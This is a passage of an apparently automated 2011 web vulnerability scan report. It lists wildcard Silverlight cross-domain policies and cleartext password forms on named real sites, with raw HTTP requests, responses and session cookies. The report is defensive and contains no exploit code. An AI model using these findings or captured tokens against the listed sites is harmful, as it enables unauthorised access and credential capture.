Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: iinet.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:32 GMT
Server: Omniture DC/2.0.0
xserver: www323
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.4. http://j2global.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j2global.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: j2global.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:31 GMT
Server: Omniture DC/2.0.0
xserver: www9
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.5. http://met1.hp.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://met1.hp.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: met1.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:17:02 GMT
Server: Omniture DC/2.0.0
xserver: www81
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.6. http://upc.d2.sc.omtrdc.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://upc.d2.sc.omtrdc.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: upc.d2.sc.omtrdc.net

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:40:45 GMT
Server: Omniture DC/2.0.0
xserver: www9
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.7. http://d.ligatus.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://d.ligatus.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: d.ligatus.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"1167-1291379570000"
Last-Modified: Fri, 03 Dec 2010 12:32:50 GMT
Content-Type: application/xml
Content-Length: 1167
Date: Sun, 15 May 2011 15:40:41 GMT
Connection: close
Server: Apache

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<!--Enables Silverlight 3 all methods functionality-->
<policy>
<allow-from http-reque
...[SNIP]...
<domain uri="*.ligatus.com"/>
...[SNIP]...
<domain uri="*.net.nl"/>
...[SNIP]...
<domain uri="*.sbs6.nl"/>
...[SNIP]...
<domain uri="*.veronicatv.nl"/>
...[SNIP]...
<domain uri="*.adverterenbijsbs.nl"/>
...[SNIP]...
<domain uri="*.ligatus.com"/>
...[SNIP]...
<domain uri="*.net.nl"/>
...[SNIP]...
<domain uri="*.sbs6.nl"/>
...[SNIP]...
<domain uri="*.veronicatv.nl"/>
...[SNIP]...
<domain uri="*.adverterenbijsbs.nl"/>
...[SNIP]...

6. Cleartext submission of password  previous  next
There are 13 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://forum.mailsite.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.mailsite.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: forum.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: No-Store
Date: Sun, 15 May 2011 13:08:45 GMT
Pragma: no-cache
Content-Type: text/html
Expires: Fri, 13 May 2011 13:08:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: WWF=LV=2011%2D05%2D15+06%3A08%3A45&SID=91c253bba5zz3cea9fd1zzb1e9ca3e33; expires=Tue, 15-May-2012 13:08:44 GMT; path=/
Set-Cookie: ASPSESSIONIDQQDRABTC=PIHBGCODEMAPJLAMMMEDLLPO; path=/
Vary: Accept-Encoding
Content-Length: 7548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<m
...[SNIP]...
<td align="right" class="smText">
<form method="post" name="frmLogin" id="frmLogin" action="login_user.asp">Quick Login
<input type="text" size="10" name="name" id="name" style="font-size: 10px;" />
<input type="password" size="10" name="password" id="password" style="font-size: 10px;" />
<input type="hidden" name="NS" id="NS" value="1" />
...[SNIP]...

6.2. http://www.ekkows.0479228880.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ekkows.0479228880.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.ekkows.0479228880.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ekko.ws/

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:25:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: osCsid=b3496b3cc35f9f20c355233ce2de654f; path=/ekkows/; domain=0479228880.com
Content-Type: text/html
Content-Length: 47977

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="fr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>eKKo sHop</title>
<bas
...[SNIP]...
<td align="left" class="boxText">        
       <form name="login" action="login.php?action=process" method="post">
            <center>
...[SNIP]...
<font size="1" class="smallText"> <input type="password" maxLength="40" value name="password" size="12"></b>
...[SNIP]...

6.3. http://www.host7x24.com/auth/login.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.host7x24.com
Path:   /auth/login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /auth/login.php?PHPSESSID=cbfdc595393b00a26ba316a7aa3aed04fc95f16a HTTP/1.1
Host: www.host7x24.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=cbfdc595393b00a26ba316a7aa3aed04fc95f16a; amen_sc=dea223016be9e761738f01830448b9ce

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:42:21 GMT
Server: Apache
Set-Cookie: PHPSESSID=cbfdc595393b00a26ba316a7aa3aed04fc95f16a; path=/; domain=.host7x24.com
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 5302

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><HTML><HEAD>


<!-- PERF_LAST:: 0.014724016189575 secs -->


<!-- InstanceBeginEditable name="head" --> <!------------------
...[SNIP]...
</script>

<form name="espaceLog" method="POST" action="http://www.host7x24.com/auth/login.php">
<div class="GenericBoxLeftCorner">
...[SNIP]...
</label>
<input type="password" id="password" name="password" value="">
<p>
...[SNIP]...

6.4. http://www.internetnatrgovina.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetnatrgovina.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.internetnatrgovina.com
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,43692
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:01:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.5
Set-Cookie: cookie_test=please_accept_for_session; expires=Tue, 14-Jun-2011 14:01:19 GMT; path=/; domain=internetnatrgovina.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 147000


       <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="si">
<head>

<!-- Bof products_new_glide module -->
<script type="text/javascript" src="jquery-1.2.3.pack.js">
...[SNIP]...
<td align="center" class="TextBox">
<form name="login" method="post" action="http://www.internetnatrgovina.com/login.php?action=process">
<table border="0" width="100%" cellspacing="0" cellpadding="2">
...[SNIP]...
<td align="center" class="infoBoxContents">
<input type="password" name="password" maxlength="40" size="20" value="">
</td>
...[SNIP]...

6.5. http://www.mailsite.com/portal/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /portal/ HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/download.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:06:10 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10544


<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
       <SCRIPT LANGUAGE="JavaScript">
       function popUp(URL) {
           da
...[SNIP]...
</p>
   <form name="LoginForm" action="/portal/login.asp" method="post" target="_self" ID="Form2">
                   
                   <input type="hidden" name="Login_Action" value="Process" ID="Hidden2">
...[SNIP]...
<br>
<input type="password" size="19" maxlength="20" name="Login_Password"
           
            id="Password1">

<input type="hidden" name="Login_Submit">
...[SNIP]...

6.6. http://www.mailsite.com/portal/cases/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/cases/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /portal/cases/ HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/cases/cases.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:07:15 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10544


<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
       <SCRIPT LANGUAGE="JavaScript">
       function popUp(URL) {
           da
...[SNIP]...
</p>
   <form name="LoginForm" action="/portal/login.asp" method="post" target="_self" ID="Form2">
                   
                   <input type="hidden" name="Login_Action" value="Process" ID="Hidden2">
...[SNIP]...
<br>
<input type="password" size="19" maxlength="20" name="Login_Password"
           
            id="Password1">

<input type="hidden" name="Login_Submit">
...[SNIP]...

6.7. http://www.mailsite.com/portal/cases/cases.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/cases/cases.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /portal/cases/cases.asp HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/unsubscribe.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:07:08 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10544


<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
       <SCRIPT LANGUAGE="JavaScript">
       function popUp(URL) {
           da
...[SNIP]...
</p>
   <form name="LoginForm" action="/portal/login.asp" method="post" target="_self" ID="Form2">
                   
                   <input type="hidden" name="Login_Action" value="Process" ID="Hidden2">
...[SNIP]...
<br>
<input type="password" size="19" maxlength="20" name="Login_Password"
           
            id="Password1">

<input type="hidden" name="Login_Submit">
...[SNIP]...

6.8. http://www.mailsite.com/portal/download.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/download.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /portal/download.asp HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmb=116582298; __utmc=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:04:24 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10544


<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
       <SCRIPT LANGUAGE="JavaScript">
       function popUp(URL) {
           da
...[SNIP]...
</p>
   <form name="LoginForm" action="/portal/login.asp" method="post" target="_self" ID="Form2">
                   
                   <input type="hidden" name="Login_Action" value="Process" ID="Hidden2">
...[SNIP]...
<br>
<input type="password" size="19" maxlength="20" name="Login_Password"
           
            id="Password1">

<input type="hidden" name="Login_Submit">
...[SNIP]...

6.9. http://www.mailsite.com/portal/unsubscribe.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/unsubscribe.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /portal/unsubscribe.asp HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:07:05 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10544


<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
       <SCRIPT LANGUAGE="JavaScript">
       function popUp(URL) {
           da
...[SNIP]...
</p>
   <form name="LoginForm" action="/portal/login.asp" method="post" target="_self" ID="Form2">
                   
                   <input type="hidden" name="Login_Action" value="Process" ID="Hidden2">
...[SNIP]...
<br>
<input type="password" size="19" maxlength="20" name="Login_Password"
           
            id="Password1">

<input type="hidden" name="Login_Submit">
...[SNIP]...

6.10. http://www.mailsite.com/portal/updateprofile.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/updateprofile.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /portal/updateprofile.asp HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/products/MailSite-version-9-Whats-New.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:06:43 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10544


<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
       <SCRIPT LANGUAGE="JavaScript">
       function popUp(URL) {
           da
...[SNIP]...
</p>
   <form name="LoginForm" action="/portal/login.asp" method="post" target="_self" ID="Form2">
                   
                   <input type="hidden" name="Login_Action" value="Process" ID="Hidden2">
...[SNIP]...
<br>
<input type="password" size="19" maxlength="20" name="Login_Password"
           
            id="Password1">

<input type="hidden" name="Login_Submit">
...[SNIP]...

6.11. http://www.mavi1.org/forum/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mavi1.org
Path:   /forum/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /forum/ HTTP/1.1
Host: www.mavi1.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.excelldirect.com/

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:25:50 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Set-Cookie: phpbb3_e7w4q_u=1; expires=Mon, 14-May-2012 15:25:50 GMT; path=/; domain=.mavi1.org; HttpOnly
Set-Cookie: phpbb3_e7w4q_k=; expires=Mon, 14-May-2012 15:25:50 GMT; path=/; domain=.mavi1.org; HttpOnly
Set-Cookie: phpbb3_e7w4q_sid=53ec9682a620adcaf7ec08be9021e006; expires=Mon, 14-May-2012 15:25:50 GMT; path=/; domain=.mavi1.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 53571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="tr" xml:lang="tr">

...[SNIP]...
<br clear="all" />

   <form method="post" action="./ucp.php?mode=login&amp;sid=53ec9682a620adcaf7ec08be9021e006">
   
   
   <div class="cap-div">
...[SNIP]...
</span> <input class="post" type="password" name="password" size="10" />&nbsp; <span class="gensmall">
...[SNIP]...

6.12. http://www.mmabasket.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmabasket.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.mmabasket.com
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,43678
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:04:13 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8r DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: osCsid=b9cf0174de8bea0cba31cfede1d514a4; path=/; domain=mmabasket.com
Content-Type: text/html
Content-Length: 31258


<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<html dir="LTR" lang="en">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>MMA Clothing Silv
...[SNIP]...
<div class="news-box-top"><form name="login" action="http://mmabasket.com/login.php?action=process&osCsid=b9cf0174de8bea0cba31cfede1d514a4" method="post"><a href="http://mmabasket.com/create_account.php?osCsid=b9cf0174de8bea0cba31cfede1d514a4">
...[SNIP]...
<input type="text" onfocus="chkval(this.value)" onblur="chkval2(this.value)" class="newsletter-box" id="email" name="email_address" value="Email" /> <input name="password" id="password" onfocus="chkval3(this.value)" onblur="chkval4(this.value)" class="newsletter-box2" value="Password" type="password" /> <input type="submit" value="Submit" class="btn-red" />
...[SNIP]...

6.13. http://www.siyamiozkan.com.tr/forum/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.siyamiozkan.com.tr
Path:   /forum/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /forum/ HTTP/1.1
Host: www.siyamiozkan.com.tr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.excelldirect.com/

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:25:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Set-Cookie: phpbb3_qyubt_u=1; expires=Mon, 14-May-2012 15:25:47 GMT; path=/; domain=.mavideniz1.org; HttpOnly
Set-Cookie: phpbb3_qyubt_k=; expires=Mon, 14-May-2012 15:25:47 GMT; path=/; domain=.mavideniz1.org; HttpOnly
Set-Cookie: phpbb3_qyubt_sid=641dabe7c6bc0016fc0a1a07097bedba; expires=Mon, 14-May-2012 15:25:47 GMT; path=/; domain=.mavideniz1.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
